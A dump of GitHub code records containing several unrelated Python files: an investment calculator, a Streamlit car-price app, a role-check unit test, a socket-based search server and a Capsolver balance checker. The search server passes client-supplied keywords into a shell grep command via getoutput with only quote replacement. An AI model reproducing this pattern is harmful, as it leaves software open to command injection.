{"api_name": "imagehash.phash", "line_number": 122, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 122, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 122, "usage_type": "name"}, {"api_name": "cv2.drawContours", "line_number": 139, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 144, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 148, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 164, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 172, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 177, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 177, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 192, "usage_type": "call"}, {"api_name": "json.load", "line_number": 196, "usage_type": "call"}, {"api_name": "imagehash.hex_to_hash", "line_number": 202, "usage_type": "call"}, {"api_name": "imagehash.hex_to_hash", "line_number": 204, "usage_type": "call"}, {"api_name": "imagehash.hex_to_hash", "line_number": 209, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 217, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 250, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 254, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 258, "usage_type": "call"}]} +{"seq_id": "14101645751", "text": "import numpy as np\r\nimport pandas as pd\r\nimport random\r\nfrom itertools import combinations\r\n\r\n# Alguns indices economicos utilizados nos investimentos\r\ncdi_hoje_ano = 11.61\r\ncdi_hoje_mes = 0.92\r\n\r\nipca_hoje_ano = 10.54\r\nipca_hoje_mes = 0.83\r\n\r\nselic_hoje_ano = 11.75\r\n\r\nibov_ano = 21.19\r\n\r\n# Funcao para retornar os valores de cada investimento\r\n# Obs.: nao foi utilizado nenhuma taxa de imposto para fins de simplificacao\r\ndef valor_final_invest(investmentType, aporte_inicial, aporte_mensal, meses, taxa, benchmark,\r\n cdi_hoje_mes=cdi_hoje_mes, ipca_hoje_mes=ipca_hoje_mes,\r\n cdi_hoje_ano=cdi_hoje_ano, ipca_hoje_ano=ipca_hoje_ano,\r\n selic_hoje_ano=selic_hoje_ano, ibov_hoje_ano=ibov_ano):\r\n valor_final = 0\r\n\r\n # CDB e LCI e LCA\r\n if investmentType == 1 or investmentType == 3 or investmentType == 4:\r\n if benchmark == 'CDI':\r\n juros = 1 + (cdi_hoje_mes * taxa / 100 / 100) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Relacionado a IPCA\r\n if benchmark == 'IPCA':\r\n juros = (1 + (ipca_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Titulo do Tesouro\r\n if investmentType == 5:\r\n\r\n # Relacionado a IPCA\r\n if benchmark == 'IPCA':\r\n juros = (1 + (ipca_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Relacionado a SELIC\r\n if benchmark == 'SELIC':\r\n juros = (1 + (selic_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Relacionado a PRE-FIXADO\r\n if benchmark == 'PRE':\r\n juros = (1 + (taxa / 100)) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Debenture\r\n if investmentType == 6:\r\n\r\n # Relacionado a IPCA\r\n if benchmark == 'IPCA':\r\n juros = (1 + (ipca_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Relacionado a CDI\r\n if benchmark == 'CDI':\r\n juros = (1 + (cdi_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Fundo de Renda Fixa\r\n if investmentType == 10:\r\n\r\n # Relacionado a IPCA\r\n if benchmark == 'IPCA':\r\n juros = (1 + (ipca_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Relacionado a CDI\r\n if benchmark == 'CDI':\r\n juros = (1 + (cdi_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Fundo Multimercado\r\n if investmentType == 11:\r\n\r\n # Relacionado a IPCA\r\n if benchmark == 'IPCA':\r\n juros = (1 + (ipca_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n # Fundo de Renda Variavel\r\n if investmentType == 12:\r\n\r\n # Relacionado a IBOV\r\n if benchmark == 'IBOV':\r\n\r\n juros = (1 + (ibov_hoje_ano + taxa) / 100) ** (1 / 12) # taxa de juros por mês da aplicação\r\n for i in range(meses):\r\n if i == 0:\r\n investimento = aporte_inicial * juros ** (meses)\r\n valor_final = valor_final + investimento\r\n\r\n else:\r\n investimento = aporte_mensal * juros ** (meses - i)\r\n valor_final = valor_final + investimento\r\n\r\n return round(valor_final, 2)\r\n\r\n\r\n# Calculo de toda as combicanocoes possiveis de n investimentos dentro de uma lista de valores\r\ndef combs(lst, n):\r\n return [c for c in combinations(lst, n)], list(combinations(range(len(lst)), n))\r\n\r\n# Realiza a soma de todas as combinacoes acima e retorna qual esta mais perto ou acima do valor target\r\n# Ppontos de melhorias:\r\n# Colocar investimentos ruins na lista de melhor combinação pela soma dos valores chegar mais perto do target\r\n# Possibilidades: colocar ranking de investimentos e utilizar esse fator no erro\r\ndef best_match(lst, target, n):\r\n best = max(combs(lst, n)[0], key=lambda c: ((sum(c) - target), len(c)))\r\n\r\n index_best = combs(lst, n)[0].index(best)\r\n index_true = combs(lst, n)[1][index_best]\r\n return best, index_true\r\n\r\n\r\n# Funcao que retorna os investimentos escolhidos por nós de acordo com os parametros de entrada do cliente\r\n# Pontos de melhorias:\r\n# 1 - Investimentos a serem oferecidos terao o valor de aporte inicial dividido igualmente entre eles\r\ndef best_investments(aporte_inicial, aporte_mensal, meses, target, perfil, df, max=3):\r\n # Realizar o calculo para n elementos de investimento a serem oferecidos e depois checar qual e o melhor\r\n for n in range(max):\r\n # 1 passo: calculo final dos valores de cada investimento\r\n val_invest_fin = []\r\n for j in range(df.shape[0]):\r\n val_invest_fin.append(valor_final_invest(investmentType=df.iloc[j]['investmentType'],\r\n aporte_inicial=aporte_inicial / (n + 1),\r\n aporte_mensal=aporte_mensal / (n + 1), meses=meses,\r\n taxa=df.iloc[j]['Taxas'],\r\n benchmark=df.iloc[j]['Benchmark']))\r\n\r\n # Adiciona uma coluna de valores finais dos investimentos\r\n df_invest_val_fin = df.assign(ValorFinal=val_invest_fin)\r\n\r\n # 2 passo: Filtros\r\n # - dados de acordo com os requisitos do cliente e que sejam do Safra:\r\n df_invest_filtered_1 = df_invest_val_fin.loc[(df_invest_val_fin['tempoMin'] <= meses) &\r\n (df_invest_val_fin['valorMin'] <= aporte_inicial / (n + 1)) &\r\n (df_invest_val_fin['Issuer'] == 'Safra')]\r\n\r\n # - retirando investimentos que não estão de acordo com o perfil do investidor:\r\n if perfil == 1:\r\n df_invest_filtered_2 = df_invest_filtered_1.loc[(df_invest_filtered_1['investmentType'] == 1) |\r\n (df_invest_filtered_1['investmentType'] == 3) |\r\n (df_invest_filtered_1['investmentType'] == 4) |\r\n (df_invest_filtered_1['investmentType'] == 5) |\r\n (df_invest_filtered_1['investmentType'] == 10)]\r\n\r\n if perfil == 2:\r\n df_invest_filtered_2 = df_invest_filtered_1.loc[(df_invest_filtered_1['investmentType'] == 1) |\r\n (df_invest_filtered_1['investmentType'] == 3) |\r\n (df_invest_filtered_1['investmentType'] == 4) |\r\n (df_invest_filtered_1['investmentType'] == 5) |\r\n (df_invest_filtered_1['investmentType'] == 6) |\r\n (df_invest_filtered_1['investmentType'] == 10) |\r\n (df_invest_filtered_1['investmentType'] == 11)]\r\n else:\r\n df_invest_filtered_2 = df_invest_filtered_1\r\n\r\n if n + 1 == max:\r\n winner = best_match(df_invest_filtered_2['ValorFinal'], target, n=max)\r\n\r\n list_index = list(winner[1])\r\n\r\n return df_invest_filtered_2.iloc[list_index]\r\n\r\n# Recebe: um df já filtrado com especificacoes de tempo, aporte minimo e investimentos do safra\r\n# Recebe: investimento alvo que se deseja propor outros similares\r\n# Retorna: subset de investimentos similares\r\ndef invest_similar(df, winner, productType, valorFinal, dist=0.01):\r\n range_min = 1 - dist\r\n range_max = 1 + dist\r\n\r\n # Retirar os elementos ja selecionados pelo algoritmo\r\n df = df.drop(list(winner.index), axis=0)\r\n\r\n # Filtrando pelos requisitos\r\n df_similares = df.loc[(df['ValorFinal'] <= valorFinal * range_max) &\r\n (df['ValorFinal'] >= valorFinal * range_min) &\r\n (df['ProductType'] == productType)]\r\n\r\n return df_similares\r\n", "repo_name": "Pesati/Safra-Smart-Invest", "sub_path": "python/utilities.py", "file_name": "utilities.py", "file_ext": "py", "file_size_in_byte": 11804, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "itertools.combinations", "line_number": 169, "usage_type": "call"}]} +{"seq_id": "40628349", "text": "import streamlit as st\nfrom PIL import Image\nimport json\nimport datetime\n\nimport pickle\nmodel = pickle.load(open('model\\\\vehicle_price_predicting_model.pickle','rb'))\n\nwith open(\"model\\columns.json\",'r') as f:\n columns = json.load(f)['vehicle_brand'][1:]\ncurrent_year = datetime.datetime.now().year\n\ndef main():\n title = 'Vehicle Price Predictor'\n st.set_page_config(page_title=title, page_icon=\"🚗\") \n st.title(\"Vehicle Price Predictor 🚘🏍️\")\n\n st.markdown(\"#### Wanna sell your used vehicle!?\\n##### You are at the best place.. 🔮 \")\n img = Image.open('app\\\\4-2-car-png-hd.png')\n st.image(img, width=450)\n\n st.write('')\n st.write('')\n\n st.selectbox('Select the brand of your car', columns)\n\n years = st.number_input('In which year car was purchased ?',2000, current_year, step=1, key ='year')\n Years_old = current_year-years\n\n Present_Price = st.number_input('What is the current ex-showroom price of the car ? (In ₹lakhs)',\n 0.00, 50.00, step=0.5, key ='present_price')\n\n Kms_Driven = st.number_input('What is distance completed by the car in Kilometers ?',\n 0.00, 500000.00, step=500.00, key ='drived')\n\n Owner = st.radio(\"The number of owners the car had previously ?\", (0, 1, 3), key='owner')\n\n Fuel_Type_Petrol = st.selectbox('What is the fuel type of the car ?',('Petrol','Diesel', 'CNG'), key='fuel')\n if(Fuel_Type_Petrol=='Petrol'):\n Fuel_Type_Petrol=1\n Fuel_Type_Diesel=0\n elif(Fuel_Type_Petrol=='Diesel'):\n Fuel_Type_Petrol=0\n Fuel_Type_Diesel=1\n else:\n Fuel_Type_Petrol=0\n Fuel_Type_Diesel=0\n\n Seller_Type_Individual = st.selectbox('Are you a dealer or an individual ?', ('Dealer','Individual'), key='dealer')\n if(Seller_Type_Individual=='Individual'):\n Seller_Type_Individual=1\n else:\n Seller_Type_Individual=0\t\n\n Transmission_Manual = st.selectbox('What is the Transmission Type ?', ('Manual','Automatic'), key='manual')\n if(Transmission_Manual=='Manual'):\n Transmission_Manual=1\n else:\n Transmission_Manual=0\n\n if st.button(\"Estimate Price\", key='predict'):\n try:\n Model = model\n prediction = Model.predict([[Present_Price, Kms_Driven, Owner, Years_old,\n Fuel_Type_Diesel, Fuel_Type_Petrol, Seller_Type_Individual, Transmission_Manual]])\n output = round(prediction[0],2)\n if output<0:\n st.warning(\"You will be not able to sell this car !!\")\n else:\n st.success(\"You can sell the car for {} lakhs 🙌\".format(output))\n except:\n st.warning(\"Oops!! Something went wrong\\nTry again\")\n\nif __name__ == '__main__':\n main()", "repo_name": "DarshanJoshi981/VehiclePricePredictor", "sub_path": "app/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2723, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pickle.load", "line_number": 7, "usage_type": "call"}, {"api_name": "json.load", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 11, "usage_type": "attribute"}, {"api_name": "streamlit.set_page_config", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 16, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 18, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 19, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 19, "usage_type": "name"}, {"api_name": "streamlit.image", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 22, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 23, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 25, "usage_type": "call"}, {"api_name": "streamlit.number_input", "line_number": 27, "usage_type": "call"}, {"api_name": "streamlit.number_input", "line_number": 30, "usage_type": "call"}, {"api_name": "streamlit.number_input", "line_number": 33, "usage_type": "call"}, {"api_name": "streamlit.radio", "line_number": 36, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 38, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 49, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 55, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 61, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 68, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 70, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "33518028153", "text": "# (c) 2014 The Regents of the University of California. All rights reserved,\n# subject to the license below.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy of the\n# License at http://www.apache.org/licenses/LICENSE-2.0. Unless required by\n# applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\n'''\nCreated on May 9, 2013\n\n@author: dip\n'''\nimport unittest\nfrom smarter.security.roles.base import BaseRole\nfrom pyramid.security import Allow\nfrom smarter_common.security.constants import RolesConstants\nimport edauth\nfrom edcore.tests.utils.unittest_with_edcore_sqlite import get_unittest_tenant_name,\\\n UnittestEdcoreDBConnection, Unittest_with_edcore_sqlite\nfrom edcore.security.tenant import set_tenant_map\nfrom edauth.tests.test_helper.create_session import create_test_session\nfrom edauth.security.user import RoleRelation\nfrom pyramid.testing import DummyRequest\nfrom pyramid import testing\n\n\nclass TestBase(Unittest_with_edcore_sqlite):\n\n def setUp(self):\n defined_roles = [(Allow, RolesConstants.PII, ('view', 'logout')),\n (Allow, RolesConstants.SAR_EXTRACTS, ('view', 'logout'))]\n edauth.set_roles(defined_roles)\n self.tenant = get_unittest_tenant_name()\n set_tenant_map({self.tenant: \"NC\"})\n dummy_session = create_test_session([RolesConstants.PII])\n dummy_session.set_user_context([RoleRelation(RolesConstants.PII, get_unittest_tenant_name(), \"NC\", \"228\", \"242\"),\n RoleRelation(RolesConstants.SAR_EXTRACTS, get_unittest_tenant_name(), \"NC\", \"228\", \"242\")])\n self.user = dummy_session.get_user()\n self.__request = DummyRequest()\n self.__config = testing.setUp(request=self.__request, hook_zca=False)\n self.__config.testing_securitypolicy(self.user)\n\n def test_check_context(self):\n with UnittestEdcoreDBConnection() as connection:\n base = BaseRole(connection, 'base')\n context = base.check_context(self.tenant, self.user, ['nostudent'])\n self.assertFalse(context)\n\n def test_check_context_with_context(self):\n with UnittestEdcoreDBConnection() as connection:\n base = BaseRole(connection, RolesConstants.PII)\n student_ids = ['e2f3c6a5-e28b-43e8-817b-fc7afed02b9b']\n context = base.check_context(self.tenant, self.user, student_ids)\n self.assertTrue(context)\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()\n", "repo_name": "SmarterApp/RDW_DataWarehouse", "sub_path": "smarter/smarter/tests/security/roles/test_base.py", "file_name": "test_base.py", "file_ext": "py", "file_size_in_byte": 2848, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "edcore.tests.utils.unittest_with_edcore_sqlite.Unittest_with_edcore_sqlite", "line_number": 31, "usage_type": "name"}, {"api_name": "pyramid.security.Allow", "line_number": 34, "usage_type": "name"}, {"api_name": "smarter_common.security.constants.RolesConstants.PII", "line_number": 34, "usage_type": "attribute"}, {"api_name": "smarter_common.security.constants.RolesConstants", "line_number": 34, "usage_type": "name"}, {"api_name": "pyramid.security.Allow", "line_number": 35, "usage_type": "name"}, {"api_name": "smarter_common.security.constants.RolesConstants.SAR_EXTRACTS", "line_number": 35, "usage_type": "attribute"}, {"api_name": "smarter_common.security.constants.RolesConstants", "line_number": 35, "usage_type": "name"}, {"api_name": "edauth.set_roles", "line_number": 36, "usage_type": "call"}, {"api_name": "edcore.tests.utils.unittest_with_edcore_sqlite.get_unittest_tenant_name", "line_number": 37, "usage_type": "call"}, {"api_name": "edcore.security.tenant.set_tenant_map", "line_number": 38, "usage_type": "call"}, {"api_name": "edauth.tests.test_helper.create_session.create_test_session", "line_number": 39, "usage_type": "call"}, {"api_name": "smarter_common.security.constants.RolesConstants.PII", "line_number": 39, "usage_type": "attribute"}, {"api_name": "smarter_common.security.constants.RolesConstants", "line_number": 39, "usage_type": "name"}, {"api_name": "edauth.security.user.RoleRelation", "line_number": 40, "usage_type": "call"}, {"api_name": "smarter_common.security.constants.RolesConstants.PII", "line_number": 40, "usage_type": "attribute"}, {"api_name": "smarter_common.security.constants.RolesConstants", "line_number": 40, "usage_type": "name"}, {"api_name": "edcore.tests.utils.unittest_with_edcore_sqlite.get_unittest_tenant_name", "line_number": 40, "usage_type": "call"}, {"api_name": "edauth.security.user.RoleRelation", "line_number": 41, "usage_type": "call"}, {"api_name": "smarter_common.security.constants.RolesConstants.SAR_EXTRACTS", "line_number": 41, "usage_type": "attribute"}, {"api_name": "smarter_common.security.constants.RolesConstants", "line_number": 41, "usage_type": "name"}, {"api_name": "edcore.tests.utils.unittest_with_edcore_sqlite.get_unittest_tenant_name", "line_number": 41, "usage_type": "call"}, {"api_name": "pyramid.testing.DummyRequest", "line_number": 43, "usage_type": "call"}, {"api_name": "pyramid.testing.setUp", "line_number": 44, "usage_type": "call"}, {"api_name": "pyramid.testing", "line_number": 44, "usage_type": "name"}, {"api_name": "edcore.tests.utils.unittest_with_edcore_sqlite.UnittestEdcoreDBConnection", "line_number": 48, "usage_type": "call"}, {"api_name": "smarter.security.roles.base.BaseRole", "line_number": 49, "usage_type": "call"}, {"api_name": "edcore.tests.utils.unittest_with_edcore_sqlite.UnittestEdcoreDBConnection", "line_number": 54, "usage_type": "call"}, {"api_name": "smarter.security.roles.base.BaseRole", "line_number": 55, "usage_type": "call"}, {"api_name": "smarter_common.security.constants.RolesConstants.PII", "line_number": 55, "usage_type": "attribute"}, {"api_name": "smarter_common.security.constants.RolesConstants", "line_number": 55, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "27661446125", "text": "from subprocess import getoutput\nfrom _thread import start_new_thread as thread\nfrom re import search\nfrom base64 import b64decode\nfrom json import loads, dumps\nfrom socket import socket\n\n\nwith open('./public/index.html') as file:\n index = file.read()\n\n\ndef search_results(keywords):\n # note results are not output encoded. The client must sanitise the output.\n return [*map(loads, getoutput(f'grep -m 15 -iwE \\'{\" \".join(keywords).replace(chr(0x27), chr(0x20))}\\' ./index.lst').split('\\n'))]\n\n\ndef listen():\n s = socket()\n s.bind(('', 80))\n s.listen(5)\n\n while 1:\n try:\n client, _ = s.accept()\n thread(app, (client,))\n print(f'serviced connection from {_}')\n except:\n s.close()\n\n\ndef app(client):\n try:\n message = str(client.recv(4096), 'utf-8')\n\n if '@' in message:\n query_enc = search('@([a-zA-Z0-9\\+\\-=]+)@', message).group(1)\n keywords = loads(b64decode(query_enc))\n\n if type(keywords) == type([]):\n reply = dumps(search_results(keywords))\n mime = 'application/json'\n else:\n reply = index\n mime = 'text/html'\n\n except:\n reply = 'sorry, something inside me glitched'\n mime = 'text/plain'\n\n client.send(bytes(f'HTTP/1.1 200 OK\\r\\n{mime}\\r\\n\\r\\n{reply}\\r\\n\\r\\n\\r\\n', 'utf-8'))\n client.close()\n\n\nlisten()\n", "repo_name": "oelin/carrot", "sub_path": "src/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1297, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.loads", "line_number": 15, "usage_type": "argument"}, {"api_name": "subprocess.getoutput", "line_number": 15, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 19, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 26, "usage_type": "call"}, {"api_name": "re.search", "line_number": 37, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 38, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 38, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "10622590697", "text": "import time\r\nimport capsolver\r\nimport os\r\n\r\nwhile True:\r\n capsolver.api_key = input(\"Enter your Capsolver API key: \")\r\n try:\r\n balance_response = capsolver.balance()\r\n if balance_response is not None and 'balance' in balance_response:\r\n balance = balance_response['balance']\r\n break\r\n except:\r\n print(\"Incorrect API key. Please try again.\")\r\n\r\nprint(f\"Press Enter to refresh your balance.\\n You currently have ${balance:.3f}\")\r\n\r\nwhile True:\r\n command = input()\r\n if command.lower() == \"quit\":\r\n break\r\n elif command == \"\":\r\n print(\"Refreshing balance\", end=\"\", flush=True)\r\n for _ in range(6):\r\n time.sleep(0.1)\r\n print(\".\", end=\"\", flush=True)\r\n print()\r\n os.system(\"cls\" if os.name == \"nt\" else \"clear\")\r\n try:\r\n balance_response = capsolver.balance()\r\n if balance_response is not None and 'balance' in balance_response:\r\n balance = balance_response['balance']\r\n print(f\"Your balance is: {balance:.3f}\")\r\n else:\r\n print(\"Failed to get balance.\")\r\n except:\r\n print(\"Incorrect API key. Please try again.\")\r\n print(\"Press Enter to refresh the balance\")\r\n else:\r\n print(\"Invalid command.\")\r\n", "repo_name": "ExamV1/capsolverbalancechecker", "sub_path": "CapSolverBalanceChecker.py", "file_name": "CapSolverBalanceChecker.py", "file_ext": "py", "file_size_in_byte": 1328, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "capsolver.api_key", "line_number": 6, "usage_type": "attribute"}, {"api_name": "capsolver.balance", "line_number": 8, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "os.system", "line_number": 27, "usage_type": "call"}, {"api_name": "os.name", "line_number": 27, "usage_type": "attribute"}, {"api_name": "capsolver.balance", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "18940974643", "text": "import itertools\nfrom dataclasses import dataclass\nfrom typing import Any, Dict, List, Tuple\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom manner.data.components.mind_batch import MINDNewsBatch\nfrom manner.data.components.adressa_dataframe import AdressaDataFrame\nfrom transformers import PreTrainedTokenizer\n\n\nclass AdressaNewsDataset(AdressaDataFrame):\n def __init__(self, news: pd.DataFrame, behaviors: pd.DataFrame, aspect: str) -> None:\n news_ids = np.array(\n list(\n set(\n list(itertools.chain.from_iterable(behaviors.history))\n + list(itertools.chain.from_iterable(behaviors.candidates))\n )\n )\n )\n\n self.news = news.loc[news_ids]\n self.labels = np.array(self.news[aspect + \"_label\"])\n\n def __getitem__(self, idx: Any) -> Tuple[pd.DataFrame, int]:\n news = self.news.iloc[[idx]]\n label = self.labels[idx]\n\n return news, label\n\n def __len__(self) -> int:\n return len(self.news)\n\n\n@dataclass\nclass AdressaCollate:\n def __init__(\n self, \n tokenizer: PreTrainedTokenizer\n ) -> None:\n self.tokenizer = tokenizer\n\n def __call__(self, batch) -> MINDNewsBatch:\n news, labels = zip(*batch)\n\n transformed_news = self._tokenize_df(pd.concat(news))\n labels = torch.tensor(labels).long()\n\n return MINDNewsBatch(news=transformed_news, labels=labels)\n\n def _tokenize(self, x: List[str]):\n return self.tokenizer(\n x, return_tensors=\"pt\", return_token_type_ids=False, padding=True, truncation=True\n )\n\n def _tokenize_df(self, df: pd.DataFrame) -> Dict[str, Any]:\n return {\n \"text\": self._tokenize(df['title'].values.tolist())\n }\n", "repo_name": "andreeaiana/manner", "sub_path": "manner/data/components/adressa_news_dataset.py", "file_name": "adressa_news_dataset.py", "file_ext": "py", "file_size_in_byte": 1801, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "manner.data.components.adressa_dataframe.AdressaDataFrame", "line_number": 13, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 18, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 18, "usage_type": "attribute"}, {"api_name": "itertools.chain.from_iterable", "line_number": 19, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 27, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "attribute"}, {"api_name": "transformers.PreTrainedTokenizer", "line_number": 41, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 49, "usage_type": "call"}, {"api_name": "manner.data.components.mind_batch.MINDNewsBatch", "line_number": 51, "usage_type": "call"}, {"api_name": "manner.data.components.mind_batch.MINDNewsBatch", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 53, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 58, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 58, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 58, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "16069439929", "text": "import os\nimport argparse\nimport sys\nimport dateutil\nimport pytz\nimport pandas as pd\nfrom tabulate import tabulate\nimport datetime\n\n\ndef open_log(path: str) -> pd.DataFrame:\n \"\"\" Receives a string indicating the file path and return a dataframe of file data \"\"\"\n if not os.path.isfile(path):\n raise argparse.ArgumentTypeError(f\"The file {path} does not exist.\")\n\n try:\n return pd.read_csv(path, sep=\";|,|\\|\", engine=\"python\")\n\n except:\n raise argparse.ArgumentTypeError(f\"The format of file {path} is not valid. Error: {sys.exc_info()[0]} - {sys.exc_info()[1]}\")\n\n\ndef convert_timezone(date_convert: datetime) -> datetime:\n \"\"\" Receives a datetime with timezone parameter and sets the timezone to UTC \"\"\"\n return date_convert.astimezone(pytz.utc)\n\n\ndef clean_data(df_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\" Remove NaN columns, white spaces from column names and cast timestamp column to datetime\n\n Args:\n df_data : pd.Dataframe\n DataFrame with raw data\n\n Return:\n A pd.Dataframe with cleaned data\n\n \"\"\"\n try:\n df_data.dropna(axis=1, how=\"all\", inplace=True)\n df_data.columns = df_data.columns.str.replace(' ', '')\n 